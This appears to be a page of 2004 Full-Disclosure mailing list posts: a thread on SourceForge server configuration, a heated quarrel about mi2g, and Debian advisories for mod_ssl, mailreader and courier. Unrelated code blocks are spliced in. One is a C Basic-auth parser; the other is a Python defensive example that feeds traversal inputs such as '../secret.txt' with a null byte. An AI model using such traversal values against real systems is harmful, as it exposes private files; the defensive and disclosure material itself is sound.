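                     char *pass, size_t pass_cap)
{
    unsigned char buf[256];
    const unsigned char *colon;
    size_t n, ulen, plen;
    int rc;

    if (strncmp(value, "Basic ", 6) != 0)
        return AUTH_MALFORMED;
    rc = b64_decode_strict(value + 6, buf, sizeof buf, &n);
    if (rc != B64_OK)
        return rc;
    if (memchr(buf, '\0', n) != NULL)       /* embedded NUL would truncate C strings */
        return AUTH_MALFORMED;
    colon = memchr(buf, ':', n);
    if (colon == NULL)
        return AUTH_MALFORMED;
    ulen = (size_t)(colon - buf);
    plen = n - ulen - 1;
    if (ulen >= user_cap || plen >= pass_cap)
        return B64_TOO_LARGE;
    memcpy(user, buf, ulen);
    user[ulen] = '\0';
    memcpy(pass, colon + 1, plen);
    pass[plen] = '\0';
    return B64_OK;
}

int main(void)
{
    /* Constructed sample header values, not captured traffic. */
    const char *samples[] = { "Basic dXNlcjpwYXNz", "Basic =",
                              "Basic ====", "Basic YW*=" };
    char user[32], pass[32];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-20s -> %d\n", samples[i],
               parse_basic_auth(samples[i], user, sizeof user, pass, sizeof pass));
    return 0;
}
```
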

Re: [Full-Disclosure] Vulnerability in sourceforge.net

2004-07-22 Thread nicolas vigier
On Thu, 22 Jul 2004, Gregory A. Gilliss wrote:

> Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
> box. Maybe they should have chosen a better host OS?

I think they should first think about updating the kernel (I submitted a
Support request yesterday but they don't really seem to care a lot about
the security of this web server).

Linux sc8-pr-web6 2.4.20-24.9bigmem #1 SMP Mon Dec 1 11:14:38 EST 2003 i686



Re: [Full-Disclosure] Vulnerability in sourceforge.net

2004-07-22 Thread steve menard
Dang a new Mandrake 10 is currently /bin/sh
grep
[EMAIL PROTECTED] ]$ grep nobody /etc/passwd
nobody:x:99:99:Nobody:/:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
[EMAIL PROTECTED] grep nobody /etc/passwd  
nobody:x:65534:65534:Nobody:/:/bin/sh
[EMAIL PROTECTED] grep nobody /etc/passwd
nobody:x:65534:65534:Nobody:/:/bin/sh


Anders B Jansson wrote:
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
Todd Towles wrote:
Does OpenBSD do that?
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gregory A.
Gilliss
Sent: Thursday, July 22, 2004 3:31 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Vulnerability in sourceforge.net
Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
box. Maybe they should have chosen a better host OS?
G
On or about 2004.07.22 07:49:53 +, Todd Towles
([EMAIL PROTECTED]) said:

Sounds like they should have configured that page a bit 
different...made

it
run under a little less access...or said I say..it is a 
mis-configuration.
=)




Re: [Full-Disclosure] "Fud, lies and libel" against (type any name here, I'll use mi2g)

2004-07-22 Thread not-mi2g
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


On Thu, 22 Jul 2004 08:38:04 -0700 Robert Wayne <[EMAIL PROTECTED]>
wrote:

>I don't understand your point. I can laugh, you can laugh... but
>they are defamed! Can you explain why they should laugh? I don't get
>it...

de·fame
tr.v. de·famed, de·fam·ing, de·fames

   1. To damage the reputation, character, or good name of by slander
or libel.

>I don't see anywhere in their message: "trusted web sites and
>security portals posting the original hoax have contacted mi2g".
>Are you making it up (lying) ?

"In parallel, consistent negative publicity on other trusted web sites
and security portals has led to the owners of some of those sites to
contact many companies, including mi2g, with a view to buying them out
in exchange for their silence."

>It appears to me that you've spent many (valuable?) of your hours
>discrediting that company, as well as bothering us (at least me) with
>your statements.

Just you, the mi2g employee!

>You are an anonymous poster, that cowardly posts articles against
>a company and his Executive Chairman, without publishing your name!

http://www.google.com/search?hl=en&ie=UTF-8&[EMAIL PROTECTED]

http://www.google.com/search?hl=en&ie=UTF-8&[EMAIL PROTECTED]&btnG=Google+Search

You seem familiar with the concept of not posting real name while asking
questions.

>If you got a problem with mi2g may I suggest you to solve it directly
>with them instead of publishing your rubbish on security lists? You
>are abusing these lists for your own agenda and I think this is not
>fair to me nor to the other readers of the lists. Can you please stop
>posting your rants against mi2g?

For an mi2g employee, you are a retard.  My b3sp0ke intelligence thingy
sees your previous posts, where your mail comes from, and tells me you
work for them, or have some other relationship.  Are you one of those
eight customers, mad that you are spending money on their "intel" and
can't live with the idea of it being worthless?

-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkEAdhAACgkQjCNdGhHWVYwEEgCfc4hp/l9JREGLpmEuGc9IR3D/4AIA
niUdo4KJ255bxO0BiqrgZCaniuoO
=pvOd
-END PGP SIGNATURE-






Re: [OT] Middle East (was Re: [Full-Disclosure] IE)

2004-07-22 Thread a
> So please find a different and more appropriate venue for this discussion.

we are generating more traffic replying to this thread and feeding the trolls and 
telling others to take this offlist. please desist in all these actions. it only makes 
the list more unreadable


-aditya




[Full-Disclosure] [SECURITY] [DSA 532-1] New libapache-mod-ssl packages fix multiple vulnerabilities

2004-07-22 Thread debian-security-announce
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 532-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Matt Zimmerman
July 22nd, 2004 http://www.debian.org/security/faq
- --

Package        : libapache-mod-ssl
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE Ids        : CAN-2004-0488 CAN-2004-0700

Two vulnerabilities were discovered in libapache-mod-ssl:

  CAN-2004-0488 - Stack-based buffer overflow in the
  ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl,
  when mod_ssl is configured to trust the issuing CA, may allow remote
  attackers to execute arbitrary code via a client certificate with a
  long subject DN.

  CAN-2004-0700 - Format string vulnerability in the ssl_log function
  in ssl_engine_log.c in mod_ssl 2.8.19 for Apache 1.3.31 may allow
  remote attackers to execute arbitrary messages via format string
  specifiers in certain log messages for HTTPS.

For the current stable distribution (woody), these problems have been
fixed in version 2.8.9-2.3.

For the unstable distribution (sid), CAN-2004-0488 was fixed in
version 2.8.18, and CAN-2004-0700 will be fixed soon.

We recommend that you update your libapache-mod-ssl package.

Upgrade Instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3.dsc
  Size/MD5 checksum:  678 6a21d08bfe122ad4165d7764d34f0acb

http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3.diff.gz
  Size/MD5 checksum:17915 b1769bb313f5b262b0ee377cae527e63

http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9.orig.tar.gz
  Size/MD5 checksum:   752613 aad438a4ea29ae74483f7afe9db0

  Architecture independent components:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl-doc_2.8.9-2.3_all.deb
  Size/MD5 checksum:   303658 3cee43feb0382c94a91f37c869784211

  ARM architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_arm.deb
  Size/MD5 checksum:   240152 8ea7ed4b9a52ad9104c1b7241bfcfa7e

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_i386.deb
  Size/MD5 checksum:   238974 ab879ea9c8f4a25fee9f297162a720c7

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_ia64.deb
  Size/MD5 checksum:   268784 4a9593779bf0a88d6508875301aefc0b

  HP Precision architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_hppa.deb
  Size/MD5 checksum:   248170 bd367099eaea46b34f35bebfe0623ea3

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_m68k.deb
  Size/MD5 checksum:   241190 6b535557a851a978ca24c5d99cacaf6e

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_mips.deb
  Size/MD5 checksum:   236148 be9a58f7d4ebd346d6f763b55e27d4d9

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_mipsel.deb
  Size/MD5 checksum:   236104 46d64b439ff98561b0b0567cda037ca3

  PowerPC architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_powerpc.deb
  Size/MD5 checksum:   242008 97ce3ae75e342f817d16fca999a8f3ba

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_s390.deb
  Size/MD5 checksum:   242124 8ee93b53824da39d4a500d29fe01df23

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_sparc.deb
  Size/MD5 checksum:   244208 c680da2eca743338d02cdb50c6baec23

  These files will probably be moved into the stable distribution on
  its next revision.

- -
For 

[Full-Disclosure] [SECURITY] [DSA 534-1] New mailreader packages fix directory traversal vulnerability

2004-07-22 Thread debian-security-announce
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 534-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Matt Zimmerman
July 22nd, 2004 http://www.debian.org/security/faq
- --

Package        : mailreader
Vulnerability  : directory traversal
Problem-Type   : remote
Debian-specific: no
CVE Ids        : CAN-2002-1581

A directory traversal vulnerability was discovered in mailreader
whereby remote attackers could view arbitrary files with the
privileges of the nph-mr.cgi process (by default, www-data) via
relative paths and a null byte in the configLanguage parameter.

For the current stable distribution (woody), this problem has been
fixed in version 2.3.29-5woody1.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you update your mailreader package.

Upgrade Instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/m/mailreader/mailreader_2.3.29-5woody1.dsc
  Size/MD5 checksum:  623 40827025821290e7130571a78fd0b06d

http://security.debian.org/pool/updates/main/m/mailreader/mailreader_2.3.29-5woody1.diff.gz
  Size/MD5 checksum:39678 b172e5b8957ee2f6b44122e0d3c99e06

http://security.debian.org/pool/updates/main/m/mailreader/mailreader_2.3.29.orig.tar.gz
  Size/MD5 checksum:   307934 8e2687227ac737f244994e19ca3ba575

  Architecture independent components:


http://security.debian.org/pool/updates/main/m/mailreader/mailreader_2.3.29-5woody1_all.deb
  Size/MD5 checksum:   362912 d3708d9d7ecc4064797f12cbe7d8489e

  These files will probably be moved into the stable distribution on
  its next revision.

- -
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBAIvOArxCt0PiXR4RAqDwAKCB50r82Lo+qViykid4ltYvAgQwegCgrZ+i
r6C1oBVSI+hEwVEytCvO70A=
=PUix
-END PGP SIGNATURE-


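The class of bug described in DSA 534-1 (relative paths plus a null byte in a parameter that names a file), shown as an added example; it is not part of the advisory and is not mailreader's code. The `.lang` suffix, the name policy, the directory `/srv/app/lang` and all function names are assumptions made for illustration.

```python
import os
import re

LANG_SUFFIX = ".lang"  # assumed file suffix, not taken from mailreader
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")  # assumed naming policy


def naive_path(lang_dir, config_language):
    """Unsafe pattern: the parameter is concatenated and trusted.

    The split models a NUL-terminated file API, which stops reading at
    the first NUL byte and so never sees the appended suffix.
    """
    joined = os.path.join(lang_dir, config_language + LANG_SUFFIX)
    return os.path.normpath(joined.split("\0", 1)[0])


def safe_path(lang_dir, config_language):
    """Return the language file path, or raise ValueError."""
    if "\0" in config_language:
        raise ValueError("NUL byte in parameter")
    if not SAFE_NAME.fullmatch(config_language):
        raise ValueError("name outside allowed alphabet")
    base = os.path.realpath(lang_dir)
    candidate = os.path.realpath(
        os.path.join(base, config_language + LANG_SUFFIX))
    # realpath resolves symlinks, so a link planted inside the
    # directory cannot point the lookup somewhere else.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes language directory")
    return candidate


def check(lang_dir, config_language):
    """Return 'ok' or the rejection reason, e.g. for request logging."""
    try:
        safe_path(lang_dir, config_language)
        return "ok"
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    # Constructed inputs; /srv/app/lang is a placeholder directory.
    for value in ["english", "../secret.txt\0", "../secret", "en\0"]:
        print(repr(value), "->", naive_path("/srv/app/lang", value),
              "|", check("/srv/app/lang", value))
```

The rejection reasons returned by `check` are suitable for request logs, where repeated NUL-byte or out-of-alphabet values in a file-selecting parameter are a useful detection signal.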

[Full-Disclosure] [SECURITY] [DSA 533-1] New courier packages fix cross-site scripting vulnerability

2004-07-22 Thread debian-security-announce
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 533-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Matt Zimmerman
July 22nd, 2004 http://www.debian.org/security/faq
- --

Package        : courier
Vulnerability  : cross-site scripting
Problem-Type   : remote
Debian-specific: no
CVE Ids        : CAN-2004-0591

A cross-site scripting vulnerability was discovered in sqwebmail, a
web mail application provided by the courier mail suite, whereby an
attacker could cause web script to be executed within the security
context of the sqwebmail application by injecting it via an email
message.

For the current stable distribution (woody), this problem has been
fixed in version 0.37.3-2.5.

For the unstable distribution (sid), this problem has been fixed in
version 0.45.4-4.

We recommend that you update your courier package.

Upgrade Instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- 

  Source archives:

http://security.debian.org/pool/updates/main/c/courier/courier_0.37.3-2.5.dsc
  Size/MD5 checksum:  913 9f807cbbd29262fb1122b65060255364
http://security.debian.org/pool/updates/main/c/courier/courier_0.37.3-2.5.diff.gz
  Size/MD5 checksum:33252 c3005c334dbc98f1ced5e6d27d014176
http://security.debian.org/pool/updates/main/c/courier/courier_0.37.3.orig.tar.gz
  Size/MD5 checksum:  3238013 350cbb2e8b5f384409bdf2a15d605bc9

  Architecture independent components:


http://security.debian.org/pool/updates/main/c/courier/courier-doc_0.37.3-2.5_all.deb
  Size/MD5 checksum:   321874 9766f52b62a87e349154d49c8a01eb9a

  ARM architecture:


http://security.debian.org/pool/updates/main/c/courier/courier-authdaemon_0.37.3-2.5_arm.deb
  Size/MD5 checksum:47248 1a82fe557d0cf909f84b1477eb0421c3

http://security.debian.org/pool/updates/main/c/courier/courier-authmysql_0.37.3-2.5_arm.deb
  Size/MD5 checksum:42402 5bbae529773a02ed4eb3873dbe14e095

http://security.debian.org/pool/updates/main/c/courier/courier-base_0.37.3-2.5_arm.deb
  Size/MD5 checksum:   128588 ea9b559cc3634519f8539835404f0255

http://security.debian.org/pool/updates/main/c/courier/courier-debug_0.37.3-2.5_arm.deb
  Size/MD5 checksum:17588 1f95e1b55d8d8e63e5d948cd749b1d4f

http://security.debian.org/pool/updates/main/c/courier/courier-imap_1.4.3-2.5_arm.deb
  Size/MD5 checksum:   124534 98bf7ffaf73426973e4d6def6327f655

http://security.debian.org/pool/updates/main/c/courier/courier-ldap_0.37.3-2.5_arm.deb
  Size/MD5 checksum:53570 2f74be30e779c10c4978333d6520a50d

http://security.debian.org/pool/updates/main/c/courier/courier-maildrop_0.37.3-2.5_arm.deb
  Size/MD5 checksum:   180048 f1a6336bc28cf72c0d67d4a3074fbbf1

http://security.debian.org/pool/updates/main/c/courier/courier-mlm_0.37.3-2.5_arm.deb
  Size/MD5 checksum:   116172 aec23a01271bccf1fcd4a922533001e9

http://security.debian.org/pool/updates/main/c/courier/courier-mta_0.37.3-2.5_arm.deb
  Size/MD5 checksum:   549764 cb8808bb78b9411c726e08514e14d8bd

http://security.debian.org/pool/updates/main/c/courier/courier-pcp_0.37.3-2.5_arm.deb
  Size/MD5 checksum:55770 32c57eb11742bee944b25f72ec8c14f7

http://security.debian.org/pool/updates/main/c/courier/courier-pop_0.37.3-2.5_arm.deb
  Size/MD5 checksum:35314 cfcd25187c79ab131678c222f124cd21

http://security.debian.org/pool/updates/main/c/courier/courier-webadmin_0.37.3-2.5_arm.deb
  Size/MD5 checksum:24978 2af9134d310f12a142c6199effc34577
http://security.debian.org/pool/updates/main/c/courier/sqwebmail_0.37.3-2.5_arm.deb
  Size/MD5 checksum:   297356 f8d25450c784a3877d7593f64d628858

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/c/courier/courier-authdaemon_0.37.3-2.5_i386.deb
  Size/MD5 checksum:46322 dc4493b38acd559a4a3dcc9eb335160a

http://security.debian.org/pool/updates/main/c/courier/courier-authmysql_0.37.3-2.5_i386.deb
  Size/MD5 checksum:41754 8d9fc5959af9e155d722a8c9a4bed302

http://security.debian.org/pool/updates/main/c/courier/courier-base_0.37.3-2.5_i386.deb
  Size/MD5 checksum:   129470 9a056627abc8d69c57c226e88b7775b4

http://security.debian.org/pool/updates/main/c/courier/courier-debug_0.37.3-2.5_i386.deb
   

Re: [Full-Disclosure] Vulnerability in sourceforge.net

2004-07-22 Thread a
> Does OpenBSD do that?

yes by default openbsd does not even start the httpd so it is more secure
-aditya 